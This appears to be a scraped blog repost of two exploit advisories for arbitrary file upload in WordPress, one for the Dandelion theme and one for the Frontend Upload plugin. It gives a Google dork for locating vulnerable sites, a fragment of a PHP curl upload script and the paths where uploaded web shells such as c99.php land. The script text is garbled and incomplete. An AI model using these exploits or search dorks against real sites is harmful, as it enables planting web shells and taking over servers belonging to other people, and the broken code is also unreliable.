Wordpress Arbitry File Upload

1、Wordpress Dandelion Themes Arbitry File Upload # Exploit Title: Wordpress Dandelion Themes Arbitry File Upload # Google Dork: inurl:/wp-content/themes/dandelion/ # Date: 31/01/2014 # Exploit Author: TheBlackMonster (Marouane) # Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628 # Software Link: Not Available # Version: Web Application # Tested on: Mozilla, Chrome, Opera -> Windows & Linux ‪#‎Greetz‬ : PhantomGhost, Deto Beiber, All Moroccan Hackers. We are Moroccans, we are genuis ! [php] "@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> [/php] File Access : http://0day5.com/uploads/[years]/[month]/your_shell.php 2、Wordpress Frontend Upload Plugin - Arbitrary File Upload # Exploit Title: Frontend Upload Wordpress Plugin - File Arbitrary Upload # Date: 10/02/2014 # Author: Daniel Godoy # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com # Author Web: www.delincuentedigital.com.ar # Software: Frontend Upload # http://codecanyon.net/item/frontend-upload/6076410?WT.ac=solid_search_item&WT.seg_1=solid_search_item&WT.z_author=gtPlugins # Tested on: Linux [Comment]Greetz: Ariel Orellana, TrustedBSD, Sunplace www.remoteexecution.net www.remoteexcution.com.ar [PoC] you can upload files with php extension. Example: c99.php, shell.gif.php, etc... http://localhost/wp-content/uploads/feuGT_uploads/feuGT_1790_43000000_948109840.php ------------------------- Correo enviado por medio de MailMonstruo - www.mailmonstruo.com

发表评论